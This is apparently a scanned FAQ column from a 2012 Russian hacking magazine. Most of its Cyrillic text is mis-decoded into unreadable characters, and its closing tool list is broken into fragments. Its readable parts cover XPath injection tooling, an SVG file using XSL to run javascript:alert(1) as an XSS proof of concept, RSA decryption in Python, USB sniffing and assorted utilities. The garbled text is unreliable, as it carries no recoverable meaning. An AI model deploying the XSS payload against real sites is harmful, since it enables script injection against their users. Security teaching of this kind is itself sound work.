4'(/"56(+ ,+#/73(+' %8 9+4"(,(+1 #/&+9% +/5",:%9". ;5- )08+)" ,+#/"/+:(+ ("2&"/6 «!searchcrypt», 3+#5' :'<+ 27,'/ 3&+%8)','(+ #9"(%&+)"(%' +/9&0/+<+ ) +/5",:%9' ="15". >+, )03+5('(%- % &'8756/"/0, )95?:"?.%' ("8)"(%- +2("&7@'((0* "5<+&%/4+) % ",&'#" ) 3"4-/%, )0)+,-/#- ) +2.%1 5+<, ,+#/73-(01 ) +/,'56(+4 +9('. A+ =7(9B%+("57 #*+@ # FindCrypt, (+ 3&+%<&0)"'/ ) #9+&+#/%.

Q 0'12345,6# — 343 7'5+' 89&'26,6: ;32-9"8464<,= 8>?(,7'26, 6,94 BXI?

A C"3+4(?, :/+ 7-8)%4+#/6 Blind XPath injection 8"95?:"'/#- ) )+84+@(+#/%

)('#'(%- %84'('(%1 ) XPath-8"3&+# 9 XML 2"8' ,"((0*, )03+5(-'401 (" #/+&+(' #'&)'&". A&"9/%:'#9% #'#/&"-25%8('B )#'4 %8)'#/(+1 SQL-%(D'9B%%, /+569+ # %#3+568+)"(%'4 (' SQL, " -809" XPath. E #57:"' #5'3+1 %(D'9B%% 40 4+@'4 =+&4%&+)"/6 %#3+5(-'40' 8"3&+#0 % ,+)+56#/)+)"/6#- 5%$6 %(=+&4"B%'1 +2 7#3'*' )03+5('(%-. C'4(+<+, (+ ,+#/"/+:(+, :/+20 2"1/ 8" 2"1/+4 3'&'2&"/6 (" #'&)'&(+1 #/+&+(' #+,'&@%4+' XML-*&"(%5%.". ;'5"/6 F/+ )&7:(7?, &"874''/#-, 8"(-/%' ('25"<+,"&-(+'. G#+2'((+ 9+<," 3+, &79+1 '#/6 +/5%:("- 7/%5%/" ,5- F9#357"/"B%% BXI — XPath Blind Explorer (bit.ly/BXIExplorer). C' 3'&'<&7@'((01 +3B%-4% %(/'&='1# 3+8)+5-'/ +:'(6 <%29+ ("#/&+%/6 3&+<&"447. A+4%4+ +20:(+1 &"2+/0 3+#&',#/)+4 <'('&"B%% GET %5% POST, 3&+<&"44" ,"'/ )+84+@(+#/6 ,+2")5-/6 9 8"3&+#"4 3+568+)"/'56#9%' 8"<+5+)9%, :/+ 8(":%/'56(+ &"#$%&-'/ <&"(%B0 3&%4'('(%- /7580. E#', :/+ 3+/&'27'/#- 8","/6, 9&+4' URL 7-8)%4+<+ #9&%3/" % +3B%+("56(+<+ 3&+9#%, — F/+ 8(":'(%', 9+/+&+' #+,'&@%/#- ) 3+57:"'-4+4 +/)'/' % #%<("5%8%&7'/ +2 7#3'$(+4 %5% ('/ )03+5('(%% 8"3&+#". G#/"'/#- ("@"/6 9(+397 «GET XML» % ("25?,"/6, 9"9 #%4)+5 8" #%4)+5+4 /"1(+' #/"(+)%/#- -)(04.

Q )26: 2#&(,2, 9'?('">=@,- ?4*&8?38 9'":?'(46#":23,A ,?'$&45#+,-, ( 6'7

B,2"# , SVG. C43 ;6' 7'5+' ,29'":?'(46: 1"> 4643, +4 9'":?'(46#"#-?

A H%=&+)0' %8+2&"@'(%- )++2.' +3"#("- $/79"! :-) !"##4+/&%4 3&%4'& 3&+)','(%-

2"("56(+1 XSS 3&% 3+4+.% #3'B%"56(+ #=+&4%&+)"((+1 SVG-9"&/%(9%. I 3+37/(+ +97('4#- ) )+#3+4%("(%- + (' /"9%* 7@ % ,"5'9%*, (+, 9 )#'+2.'47 #:"#/6?, 7@' +/+$',$%* 9 %#/+&%% )&'4'("*, 9+<," 3+375-&(0' 2&"78'&0 <&'$%5% %<(+&%&+)"(%'4 MIME-/%3+), 3+57:"'40* +/ #'&)'&". ;5- (":"5" )#3+4(%4, :/+ SVG 3&',#/")5-'/ #+2+1 (' :/+ %(+', 9"9 XML-3&',#/")5'(%', %(/'&3&'/%&7'-4+' )3+#5',#/)%% &'(,'&+4. C" #"4+4 ,'5' 4+@(+ 205+ 20 3&+#/+ )95?:%/6 ) +3%#"(%' #9&%3/ (#3'B%=%9"B%- ("# /7/ (%:'4 (' +<&"(%:%)"'/), (+ 40 %#3+5687'4 /'*(%97 *"4'5'+((+<+ 3+)','(%- 3&% 3+4+.% XSL-/&"(#=+&4"B%%. J"9, ("$" )&',+(+#("- ("<&789" 27,'/ )03+5('(" 5%$6 ) #57:"' 3&-4+<+ +2&".'(%- 2&"78'&" 9 ="157, ("3&%4'& 3+#&',#/)+4 <iframe>. A&% 3+30/9' @' +/+2&"8%/6 '<+ # 3+4+.6? /'<" <img> 3+568+)"-/'56 3+57:%/ 2'8+2%,(+' %8+2&"@'(%'.

<?xml version="1.0"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]>

<svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" \ xmlns:xsl="http://www.w3.org/1999/XSL/ Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/ xhtml" \ src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fi ll="red" r="40"></circle> </svg>

Q D7##62> +#3,- E4-", ,29'":?8#7F- 1"> A&4+#+,> 14++FA 9&,"'5#+,>.

G hex-&#1436'&# 9&,?+43'( 26&'3'(FA ?+4B#+,- , 1&8*,A ?4<#9'3 +#6. H'5+' ", 343-6' 8?+46:, >(">#62> ;6' 9&'26' $,+4&+F7 9&#1264("#+,#7 343,A-6' 26&8368& ,", $F"' ,29'":?'(4+' I,E&'(4+,#?

A ;'1#/)%/'56(+, &"8+2&"/6#- ) 8"9&0/+4 =+&4"/' *&"(%5%." %5% ,"43' — 8",":"

(' %8 3&+#/0*. G#+2'((+ '#5% ('/ ,"@' 3&',3+5+@'(%1, ) 9"9+4 ("3&")5'(%% 9+3"/6 % #/+%/ 5% 9+3"/6 )++2.'. E',6 '#5% 205+ %#3+568+)"(+ $%=&+)"(%', /+ $"(#+) +2("&7@%/6 ) %/+<' %#9+40' ,"((0' 3&% /"9+4 3+,*+,' (' +#/"'/#- )+)#'. C" 3+4+.6 ) F/+1 #%/7"B%% 3&%*+,%/ 3&+#/+1 %(#/&74'(/ %8 #5+@(+<+ 4"/'4"/%:'#9+<+ "33"&"/" — %(=+&-

FAQ!"#$ %&'(&") — '(*")+,- ., FAQ@REAL.XAKEP.RU

2

JKL0MN.K)H CJD0OMKP!MJDOHQ 0JD K.KPDN) DL0MP.R)HM!M SKTPK

K+56$%(#/)+ 9&%3/+<&"=%:'#9%* =7(9B%1, %#3+5687'40* ) AG, ,'1#/)%/'56(+ ,'/'9/%-&7'40 3&% 3+4+.% #/"/%:'#9+<+ "("5%8", 3&%:'4 8":"#/7? (' /&'27'/#- (%:'<+ *%/&'' 3+%#9" 3+ #%<("/7&"4. L'<+,(- &':6 3+1,'/ + ('#9+569%* #*+@%* 3+ =7(9B%+("-57 %(#/&74'(/"*, ) #%57 3+(-/(0* 3&%:%( %4'?.%* #)+% 7(%9"56(0' #%56(0' #/+&+-(0. J"9 :/+ ('5%$(%4 27,'/ %4'/6 ) #)+'4 "&#'("5' &')'&#%(<-#+=/" #&"87 ('#9+569+ 3+,+2(0* 7/%5%/.

FindCryptA5"<%( ,5- (' (7@,"?.'<+#- ) +#+-2+4 3&',#/")5'(%% ,%8"##'425'&"-

9+42"1(" IDA Pro +/ '<+ @' #+8,"/'5-. E +/5%:%' +/ #"4+<+ ,%8"##'425'&" #)+2+,(+ &"#3&+#/&"(-'/#- )4'#/' # %#*+,(04 9+,+4, :/+ ,"'/ )+84+@(+#/6 3&% ('+2*+,%4+#/% ,+-3+5(%/6 =7(9B%+("5 ) #++/)'/#/)%% # 9+(-9&'/(+1 8",":'1. G25","'/ )(7$%/'56(04 ("2+&+4 #%<("/7& % )0#+9+1 #9+&+#/6? &"2+-/0. I(04% #5+)"4% — musthave-,+3+5('(%' 9 IDA.

1

!"#$% 09 /164/ 2012

!"#$"%& ' "()*(&

+ ,-.-/01 234- .-56- 76789:9;-!7<0 !:79.-=3>+<!93 +9+<3.?

+ ;7:8926?.9 @+<;->+<!7.9,- USB?

=AB 'CDE*F'B (GH"I" F'C-H"D$")F*)"I" )CG'J"K*L%()'B #$*K#"E('(*AMF** '%#"AM-

C")G(M G##G$G(F&L %F'NN*$. O %"PG-A*F'Q, ("AMH" (GH J"PF" "R*%#*E'(M GR%"AQ(FDQ #$"C$GEF"%(M FGRAQK*F'B KAB '%%A*KD*J"I" D%($"L%()G. 6" *%A' F*( P*AGF'B $G%%(G)G(M%B % %"(FBJ' D%A")F&S *K'F'T, KAB #$"R& #*$G J"PF" "R"L('%M ' #$"I$GJJF&J $*U*F'*J. ! Linux KAB V('S T*A*L 'J**(%B CGJ*-EG(*AMF&L J"KDAM BK$G % I")"$BW'J FGC)GF'*J usbmon, H"("$&L #"C)"AB*( #"ADEG(M KGFF&*, T'$HDA'$DQW'* J*PKD K$GL)*$GJ' D%($"L%() ' K$GL)*$"J USB

Host Controller. 6*%J"($B FG (" E(" )%* V(" #$"'%S"K'( DP* ) BK$* -+, V("I" )#"AF* K"%(G("EF" KAB #"ADE*F'B HG$('F& #$"-'%S"KBW*I" "RJ*FG KGFF&J' 'A' KGP* A")A' RGI") ) QC*$%#*L%-K$GL)*$GS :). 2("R& )%* V(" CG$GR"(GA", K"%(G("EF" #"KI$DC'(M FGU J"KDAM ' %J"F('$")G(M debugfs () BackTrack 5 R2 #" DJ"AEGF'Q V(' "#*$GT'' DP* #$"K*AGF& CGR"(A')&-J' $GC$GR"(E'HGJ'):

modprobe usbmonmount -t debugfs \none_debugs /sys/kernel/debug

OGH F' %($GFF", F" KAB $GCR"$G USB-#$"("H"AG HGH F*AMCB ADEU* #"K"LK*( )%*BKF&L Wireshark, %#"%"RF&L CGS)G-(&)G(M #"("H % 'F(*$*%DQW*L FG% U'F& ' #$*K%(G)AB(M *I" ) #"KS"KBW*J KAB )"%#$'B('B E*A")*HG )'K*.

141

SnD Crypto Scanner3W* "KF" K"#"AF*F'* KAB %*J*L-%()G "(AGKE'H") OllyDbg / Immunity

Debugger. ;G%#$"%($GFB*(%B ) )'K* K'FGJ'E*-%H"L R'RA'"(*H', #"KI$DPG*J"L #$' CG#D%H*, #"%A* E*I" CG#D%('(M #AGI'F J"PF", )&R$G) %""()*(%()DQW'L #DFH( ) J*FQ «Plugins». ,"-C)"AB*( ) "K'F HA'H )&%(G)'(M ("EH' "%(GF")G FG %*HT'' #GJB(', %"K*$PGW'* FGLK*FF&* %'I-FG(D$&. 6*JGA")GPF" ' (", E(" SnD *K'F%()*F-F&L %#$G)'A%B % "RFG$DP*F'*J F*%(GFKG$(F"L 'FK*H%F"L (GRA'T& ) $*GA'CGT'' base64.

3Hash & Crypto Detector,$"%(" DK"RF&L standalode-H$'#("%HGF*$. ,"C)"AB*( )&B)AB(M

JF"P*%()" #"A*CF&S %)"L%() '%%A*KD*J"I" NGLAG, %$*K' H"("$&S 'FN"$JGT'B "R '%#"AM-C")GFF"J H"J#'AB("$*, $*GA'C")GFF&S J*("KGS CGW'(& ' D#GH")W'HGS. <$GK'T'"FF&L %'IFG-(D$F&L #"'%H K"#"AF*F NDFHT'"FGA"J V)$'-%('E*%H"I" GFGA'CG, E(" )&I"KF" "(A'EG*( V("( K*(*H("$. ,$'B(F&J R"FD%"J B)AB*(%B )"CJ"P-F"%(M #$"'C)"K'(M CG#D%H #$'A"P*F'B ' GFGA'C DP* $G%#GH")GFF"I" '%#"AFB*J"I" H"KG.

bfcryptX&%($&L H$'#("%HGF*$, $G%#$"%($G-FB*J&L #"K A'T*FC'*L GPLv2. -KF"

'C F*JF"I'S K*L%()'(*AMF" H$"%%#AG(N"$-J*FF&S $*U*F'L KAB #"'%HG H$'#("%'IFG(D$. O"F%"AMF&L 'F(*$N*L% E$*C)&EGLF" #$"%( — ) HGE*%()* #G$GJ*($") K"%(G("EF" #$*K"%(G-)'(M A'UM 'JB '%%A*KD*J"I" NGLAG. 6'E*I" A'UF*I" — ) ADEU'S ($GK'T'BS #$'FT'#G KISS, %HGF*$, I"(")&L )&$DE'(M, ) %ADEG* F*"RS"K'J"%(' $*)*$%'FIG ) %$*K*, "(A'EF"L "( Windows.

JGT'"FFGB VF($"#'B. 9J*FF" V(G )"AU*RFGB NDFHT'B #"J"P*( FG)%H'KHD "(K*A'(M KGFF&* % FGJ*H"J FG %($DH(D$F"%(M "( H$'#("H"F(*L-F*$G. 6* )KG)GB%M ) #"K$"RF"%(', VF($"#'B — V(" )*A'E'FG, SG$GH(*$'CDQWGB F*"#$*K*A*F-F"%(M 'FN"$JGT'', (" *%(M (*"$*('E*%H' FG'R"AMU** CFGE*F'* VF($"#'' K"AP*F 'J*(M R*A&L UDJ 'A' )&)"K /dev/urandom. C")$*J*FF&* U'N$& ' GAI"$'(J& %PG('B (GHP* ) R"AMU'F%()* %)"*J )&KGQ( KGFF&* % )&%"H'J CFGE*F'*J VF($"#''. !&E'%AB(M FG RDJGPH*, H"F*EF", F'E*I" F* #$'K*(%B, #"ADE'(M '%H"JDQ T'N'$M KAB NGLAG J"PF" D('A'("L, F"%BW*L %H$"JF"* 'JB ent (bit.ly/enthropy).

Q !"#, $%"& '"(")*+(, #(-'+./-/+*), RSA, '(.0* 1/*2. ("/3-4(.1"+5

/..60*%-*?

A =AB ("I" E("R& $G%U'N$")G(M RSA-%""RW*F'*, K"%(G("EF" CFG(M (GH

FGC&)G*J&* J"KDAM (N) ' CGH$&(DQ VH%#"F*F(D (D), 'A', HGH )%* V(" )J*%(* FGC&)GQ(, CGH$&(&L HAQE. 3%A' DKGA"%M HGH'J-(" "R$GC"J 'J CG)AGK*(M, (" K*A" CG JGA&J. =AB FGU'S T*A*L 'K*GAMF" #"K"LK*( Python, FG H"("$"J #$"RA*JG $G%U'N$")GF'B %)"K'(%B H #G$* %($"H. 7 'J*FF":

#ǧȔȲțȔșȠ ȥȦȔȡȘȔȤȦȡȧȲ ȞȤȜȣȦȢȕȜȕȟȜȢȦșȞȧimport Crypto.PublicKey.RSA#N Ȝ D, ȞȔȞ ȣȤȔȖȜȟȢ, ȢȫșȡȰ ȕȢȟȰȬȜș#ȫȜȥȟȔ, Ȣ ȫșȠ ȥȢȢȕȭȜȦ ȜȡȦșȤȣȤșȦȔȦȢȤȧ #ȨȟȔȗ L Ȗ ȞȢȡȪș țȡȔȫșȡȜȳ. d=0x63e74967eaea2025c98c69f6ef07#...ǧȘșȥȰ ȕȯȟȢ ȠȡȢȗȢ ȥȦȤȢȞ ȩșȞȥȢȖ 2c6e6bd27eaa71cc0288df1ecc3b062bLn=0x95daee1be05f3038ae529ef2668a#...Ǩ țȘșȥȰ ȦȢȚș =)772888f1fd71aa08f08502a141b611fL#ǨȡȜȪȜȔȟȜțȜȤȧșȠ ȞȤȜȣȦȢȥȜȥȦșȠȧ. ǢȦȢȤȢȝ #ȣȔȤȔȠșȦȤ — ȢȦȞȤȯȦȔȳ ȱȞȥȣȢȡșȡȦȔ, ȡș #ȜȥȣȢȟȰțȧșȠȔȳ ȣȤȜ ȤȔȥȬȜȨȤȢȖȔȡȜȜ. key=Crypto.PublicKey.RSA. construct((n,0,d))#Ǣȥș, ȢȥȦȔșȦȥȳ ȟȜȬȰ ȖȯțȖȔȦȰ ȠșȦȢȘ#decrypt ȢȦ ȬȜȨȤȦșȞȥȦȔ key.decrypt(chiphertext)

4 5

789:;8< =8>?8@

>(./AB3--1"%-* USB-1$"-).C*D/+1-& 1 Wireshark

Q

"

!"#$% 09 /164/ 2012

FAQ

142

Q !"# #$%&'()&*+,## Python * "-.#/- #,0-"+10#*,&2 1&/+,3,&2 $0"&1# &4-,(

,- 5*+0+-0 +*0&3&%&',-,#6 %& ,+.+0#7 ,+ <TAB>. 8$0( '# 1+1#--,#9:3( "-;-,#6 #/-,,& 3'6 1&,$&'#?

A Python Shell !"#$% &'!($)* +$,-.&/#$- +, 010 2+'$! +3 4.#')'&5#6! 2!4.!,1,

+'#17#$ '78 (),-.!6! .#9#$+8 31'1" 2 $#,0!7%0! ,-.!0. :#.;1-% 2 6!7!2# 2,# '!,-&4$)# /#-!') + <&$0=++, 0!$#"$! ;#, $#2!3/!;$!, + 01;')* .13 2)3)21-% help() ,!2,#/ $# 0.&-! :-). >!2),+-% +$-#.10-+2$!,-% + ,0!.!,-% .1(!-) , +$-#.4.#-1-!.!/ $1/ 4!/!;#- /!'&7% rlcompleter 2 ,2830# , readline. :!,-1-!"$! 4!'07?"+-% +@ + $13$1"+-% '#*,-2+# 12-!'!4!7$#$+8 $1 $&;$&? 0712+9&.

import rlcompleterimport readlinereadline.parse_and_bind("tab: complete")

A,#, /!;$!, $1;12 <TAB>, 4!7&"1-% ,4+,!0 2!3/!;$)@ 21.+1$-!2 312#.9#$+8 0!/1$')! B-!() $# 31/!.1"+21-%,8 , 4!'07?"#$+#/ /!'&7#*, 01;')* .13 !-0.)218 $!2&? 0!$,!7%, /!;$! 4.!4+,1-% C-+ ,-.!0+ 2 <1*7 +$+=+17+-31=++ 9#771. :78 C-!6! 2 '!/19$#* '+.#0--!.++ ,!3'1'+/ <1*7 .pyrc + 4!/#,-+/ 2 $#6! C-+ ,-.!0+. D 2 .bashrc '!(12+/ 4#.#/#$$&? !0.&;#$+8, '1?5&? Python 3$1-%, !-0&'1 (.1-% 0!/1$'), +,4!7$8#/)# 4.+ 314&,0#.

cat >> ~/.bashrcexport PYTHONSTARTUP="~/.pyrc"

E?(!4)-$!, "-! , +,4!7%3!21$+#/ (+-(7+!-#0+ readlin# .1(!-1#- + 31/#"1-#7%$18 &-+7+-01 clink (bit.ly/clinkcmd), '#71?518 2!3/!;$)/ 4!7$!=#$$!# +,4!7%3!21$+# ,-1$'1.-$!6! Windows-9#771 cmd.exe, .1,-9+.88 +$-#.4.#-1-!. 12-!'!4!7$#$+8/+ + bash-4!'!($)/+ <&$0=+8/+ !4#.+.!21$+8 , +,-!.+#* 0!/1$'. (>!'.!($## ! 4!'!($)@ +$-,-.&/#$-1@ /!;$! 4.!"+-1-% 2 ,-1-%# «F+3$% 2 0!$,!7+ Windows» 2 C-!/ $!/#.#.)

Q !&$&*-0:20- '-<1&*-$,=2 >+2"*&' 3'6 Windows.

A G#;,#-#2!* C0.1$ — 0!/4!$#$- ,+,-#/), 2)(!.& 0!-!.!6!, (#3&,7!2$!, ,-!+-

&'#78-% '!,-1-!"$!# 2$+/1$+#. B 2)(!.# '78 .1(!"#* ,-1$=++ +7+ '!/19$#6! 0!/41 8 ,!2#-&? !,-1$!2+-%,8 $1 TinyWall (bit.ly/tinyfirewall). H#-.#(!21-#7%$)* 0 .#,&.,1/, !$ 4.!,-! 2)4!7$8#- 2!37!;#$$)# $1 $#6! <&$0=++ — (7!0+.&#- ,#-#2!* -.1<+0 ,!671,$! 6+(0! $1,-.1+21#/)/ 4.12+71/. A $#,0!7%0! 07+0!2 4!32!78#- 4#.#07?"1-%,8 /#;'& .#;+/1/+ 315+-), 4!''#.;+21#- 21*-7+,-+$6 4! 4.!=#,,1/ +7+ 4.+7!;#$+8/. I'$! +3 6712$)@ '!,-!+$,-2 — TinyWall 4.10-+"#,0+ $# 4.+27#01#- 0 ,#(# 2$+/1$+8 4!7%3!21-#78: #,-% 7+9% +0!$01 0!$-.!77#.1 2 ,+,-#/$!/ -.##, 1 4!,-!8$$)# +$<!./+.&?5+# !0$1 + 4!',0130+ !-,&-,-2&?-. J3 '!4!7$+-#7%$)@ <+" — $17+"+# 4!''#.;0+ IPv6 + /!$+-!.+$6 +3/#$#$+* hosts-<1*71.

Q ? %&':4#' +3/#,$1#2 3&$0:% 1 :3+'-,-,&/: *#,3&*&/: $-"*-":. @+1 ,+#9&'--

,-)+/-0,& # 9-) )+/&"&4-1 &"<+,#)&*+0( %"&$':;#*+,#- 0"+>#1+?

A K -10!* 4.!(7#/!* 4.+@!'+-,8 ,-170+-21-%,8 '!2!7%$! "1,-!. I'$10!,

0 ,"1,-%?, ,4#=) 4! ,#-#2!* (#3!41,$!,-+ + 0!/4%?-#.$!* 0.+/+$17+,-+0# +3 Netresec $14+,17+ 0!$,!7%$)* 410#-$)* ,$+<<#. RawCap (bit.ly/rawcap). G17! -!6! "-! !$1 2#,+- 2,#6! 17 0+7!(1*-, -10 #5# + $# -.#(&#- 1(,!7?-$! $+010+@ 312+,+/!,-#*: $# $1'! '!4!7$+-#7%$! $+ (+(7+!-#0, $+ ,#-#2)@ '.1*2#.!2 -+41 WinPcap! >.!,-! 314&,01#9% , 1'/+$,0+/+ 4.121/+, + 4!,7# ,-1.-1 -#(# (&'#- 4.#',-127#$ 2 &'!($!/ 2+'# ,4+,!0 2,#@ ,#-#2)@ +$-#.<#*,!2, 6'# $1'! 2)(.1-% $!/#. 4.!,7&9+21#/!6! +$-#.<#*,1 + +/8 '78 pcap-<1*71.

«D "-! ;# , C-+/ '1/4!/ '#71-% '17%9#?» — ,4.!,+9% -). H! + -&- 31 -#(8 &;# 4!31(!-+-7+,%. K1*- CloudShark.org 4.#',-1278#- ,!(!* $# "-! +$!#, 010 !$71*$-2#.,+? 3$1/#$+-!6! ,$+<<#.1 Wireshark. L16.&;1#9% pcap-<1*7 + 1$17+3+.&#9% 410#-) 2 '! (!7+ 3$10!/!/ +$-#.<#*,#. M -2!+/ &,7&61/ 4.+2)"$)# <+7%--.) + +$,-.&/#$-) '78 1$17+31. M.!/# -!6!, 2,#, "-! -) 2+'+9% $1 C0.1$# /!$+-!.1, (&'#- ,!@.1$#$! 2 !(710# + '!,-&4$! 4! 4!,-!8$$!* ,,)70#, 010 + ,1/ !.+6+$17 '1/41 410#-!2.

Q A0& /&.-;( %&$&*-0&*+0(, 1&<3+ ,:.,& $"&4,& %"&3#+<,&$0#"&*+0( $#$0-/:,

+ ,:.,&<& $&>0+, 1+1 ,+)'&, ,-0 %&3 ":1&2?

A A C-!/ 2!4.!,#, (#3 ,!/$#$+8, G1.0& N&,,+$!2+"& $#- .12$)@. O6! 7#6#$'1.-

$)# &-+7+-) '!7;$) ()-% 2 14-#"0# 01;'!6! @10#.1 :). H& 1 #,7+ 2'.&6 & -#(8 +@ $# !0131-7!,%, -! -) /!;#9% 31?31-% +@ 4.8/! , ,1*-1 SysInternals! >.!,-! 4!'07?"+ ,#-#2!* '+,0\\live.sysinternals.com\tools\. K! 2,#/+ &-+7+-1/+ /!;$! !3$10!/+-%,8 4! ,,)70# bit.ly/sysintools.

Q B+#,0-"-$&*+'$6 %&#$1&/ :6)*#/&$0-2 * %"&<"+//+5. C3- 9= *)60( /+0-"#+'=

3'6 D1$%-"#/-,0&*?

A P) $12#.$801 &;# ,7)917 4.! '+,-.+(&--+2) -+41 Damn Vulnerable Linux, 0!-!.)#

,!3'1$) ,4#=+17%$! '78 -!6!, "-!() +@ 7!/1-%. I'$10! ,7#'&#- !6!2!.+-%,8, "-! (!7%9+$,-2! -10+@ ,(!.!0 !,$!21$) $1 !4#.1=+!$$!* ,+,-#-/# Linux + ,!'#.;1-, 010 4.12+7!, ,7+90!/ -.+2+17%$)# (16+, 0!-!.)# -) 2.8' 7+ 2,-.#-+9% 2 .#17%$!* ;+3$+. B-!() .13$!!-(.13+-% 0.&6!3!. + 4.+$!.!2+-%,8 0 4!+,0& '). 2 4!4&78.$!/ ,!<-#, 0!-!.)* +,4!7%3&?- /+77+!$) 7?'#* #;#'$#2$!, ,!2#-&? &"+-%,8 ,.13& $1 C-+@ 4.!6.1//1@. >.!97! -! 2.#/8, 0!6'1 +$<!./1=+? '78 !(&"#$+8 4.+@!'+-,8 +,01-% 4! 0.&4+=1/, ,7!2$! 15 7#- $131'. A $19+ '$+ 2 K#-+ /!;$! $1*-+ /!.# +$<!./1-=++ ! 4!+,0# &832+/!,-#*. D76!.+-/ 4.!,-!*: $1*-+ !-"#- !( &832+/!,-+ + .1,4!-.!9+-% 4!'!4)-$&? 4.!6.1//& ,!671,$! C-!/& !-"#-&. N#3&7%-1-) ,2!#6! +,,7#'!21$+8 @10#.) !()"$! 2)071')21?- $1 ,1*-), 0!-!.)#

4.#',-1278?- ,!(!* (13& '1$$)@ C0,47!*-!2. K1/)/+ 4!4&78.$)/+ 8278?-,8 1337day.com + exploit-db.com. P1/ -) /!;#9% $1*-+ +$<!./1=+? !( 12-!.# + #6! +,,7#'!21$++, ,,)70+ 4! -#/#, 1 ,1/!# 6712$!# — -#@$+"#-,0+# '#-17+ &832+/!,-+. A)8,$+2 2#.,+? 4.+7!;#$+8, ,7#'&#- ,01"1-% #6! , !<+=+17%-$!6! ,1*-1 + $1"1-% C0,4#.+/#$-). I"#$% "1,-! .13.1(!-"+0+ 2)071')21?- -!7%0! ,1/&? 4!,7#'$?? ,-1(+7%$&? 2#.,+?, -!6'1 $1 4!/!5% 4.+@!'8- 1.@+2) ,-1.!6! ,!<-1. N#0!/#$'&? oldversion.com + oldapps.com, 6'# /!;$! $1*-+ 4.10-+"#,0+ 7?()# 4.!6.1//) 4!' (!7%9+$,-2! 4!4&78.$)@ 471-<!./. H& + '!(12+/ 2 0!77#0=+? 01-17!6 !(.13!2 2+.-&17%$)@ /19+$ osvirtual.net, 0&'1 &;# &,-1$!27#$) ,-1.)# 2#.,++ .137+"$)@, 2 -!/ "+,7# C03!-+"#,0+@ !4#.1=+!$$)@ ,+,-#/.

Q ? /,&<& *"-/-,# %"&*&.: )+ "+9&0&2 * BackTrack Linux, #,&<3+ <&'&*+ %"&$0&

1#%#0. @+1 /&.,& &0*'-4($6, ,- %"-1"+E+6 $*&7 3-60-'(,&$0(?

A K4#=+17%$! '78 -10+@ ,7&"1#2 .13.1(!--"+0+ Linux + '.&6+@ 2@!'85+@ 2 '+,-.+-

(&-+2 4.!6.1// 4!'6!-!2+7+ $#,0!7%0! 41,@17%$)@ 8+=. K#.%#3$)# 41.$+ -!;# /!6&- 2#,#7+-%,8 :). O,7+ -) 2'.&6 !9+(#9%,8 4.+ 22!'# 41.!78, -! 4.!6.1//1 (&'#- ,-#(1-% -#(8 :). H14.+/#., -10:

I have been called worse.Maybe if you used more than just two fi ngers...Listen, burrito brains, I don’t have time to listen to this trash.

:78 C-!6! !-.#'10-+.&* <1*7 sudoers, '!(12+2 2 0!$#= ,-.!0+ Defaults ,7!2! insults. A)678'+- 4.+/#.$! -10:

Defaults !lecture,tty_tickets,!fqdn,insults

:78 .#'10-+.!21$+8 ,!2#-&? +,4!7%3!21-% $# !()"$)* .#'10-!., 1 visudo, 0!-!.)* 4.!-2#.8#- ,+$-10,+, <1*71 4#.#' ,!@.1$#$+#/.

O,7+ -) !4#"1-1#9%,8 4.+ 22!'# !'$!* +3 ,1/)@ "1,-)@ 0!/1$' ls + 22#'#9% sl, -! $1 C0.1$# 4.!#'#- 41.!2!3+0! J$!6'1 -.#(&#-,8 ,1/!/& &,-1$!2+-% C-!- 410#-:

apt-get install sl

>!"#.4$&-% 3$1$+8 ! 31.!;'#$++ $!2!6! /+.1 /!;$!, #,7+ 2 Firefox 22#,-+ 2 1'.#,$&? ,-.!0& «about:mozilla». D #,7+ C-!- /+. -#(8 $# 4.+27#01#-, -) /!;#9% &2+'#-% .!(!-1 , '.&-6!* 471$#-), 22#'8 «about:robots». H& 1 #,7+ -) ,"+-1#9%, "-! .!(!-) — C-! $#+$-#.#,$!, -! -#(8 ;'#- +6.1 Spase Invaders. :78 C-!6! 2 4.!6.1//# Calc +3 410#-1 Open Office 22#'+ =Game("StarWars").

A !(5#/, .13.1(!-"+0+ -!;# 7?'+ +, 0!-$#"$! ;#, 4!31(!-+7+,% ! -!/, "-!() $14!7-$+-% 4.+8-$)/+ /6$!2#$+8/+ -2!+ -8;#7)# @10#.,0+# (&'$+. z

! 09 (164) C"#$%&'( 2012 x

>>W

INDO

WS

>Dev

elop

men

tBi

nVis

Crac

k.N

ET 1

.2De

pend

ency

Wal

ker

2.2

Expr

esso

3.0

Http

Wat

ch 8

.4.1

4Im

mun

ityDe

bugg

er 1

.85

jQue

ryPa

dM

iniF

uzz

1.5.

5.0

Parr

ot 4

.6.0

Penc

il 1.

3Pe

Stud

io 3

.69

Scap

y 2.

2.0

SQLi

teSt

udio

2.0

.27

Win

AppD

bg 1

.5

>Mis

cAd

vanc

ed P

DF U

tiliti

esAl

tDra

g 0.

9De

sk D

rive

1.8.

5De

skvi

ewEy

eRol

ler

1.1.

4Fi

lerF

rog

2.2.

0M

ultip

licity

2.0

bPD

Fill

9.0

Scry

be 0

.0.3

4.1

Task

Dock

To-D

o De

skLi

st 1

.70

Whe

el H

ere

1.4.

3w

inPe

nPac

k 4.

2Yo

Win

dow

3.0

>Mul

timed

ia1b

y1 1

.76

Auda

city

2.0

.1Ca

mSp

ace

8.95

Flic

Flac

1.0

1Fo

rmat

Fac

tory

2.9

6Fo

toM

ix 9

.0Fo

toM

orph

13.

6Go

bble

r 0.

1.61

mus

ic2p

c 2.

13Ra

dioZ

illa

1.1

Song

r 1.

9.43

TagS

cann

er 5

.1.6

20Vi

deoI

nspe

ctor

2.3

.0.1

26W

ebCa

mEf

fect

s

>Net

Acry

lic D

NS

Prox

y 0.

9.19

Com

odo

Free

Fire

wal

l 5.1

0Co

mod

o Ic

eDra

gon

13.0

Com

odo

Inte

rnet

Sec

urity

Cros

sLoo

p 2.

82Fo

rtiC

lient

Lite

ISP

Mon

itor

5.7.

5La

nsha

rk 0

.0.2

Net

Wor

x 5.

2.3

Outp

ost S

ecur

ity S

uite

7.1

.1SR

War

e Ir

on B

row

ser

20.0

.115

0.0

Wire

less

Wiz

ard

5.2

Xirr

us W

i-Fi I

nspe

ctor

1.2

.1.4

Zam

Zom

1.0

.0

>Sec

urity

Brow

ser

Fore

nsic

Too

lEn

hanc

ed M

itiga

tion

Expe

rienc

e

Tool

kit 3

.5fw

knop

2.0

.1Ha

sh K

rack

erHi
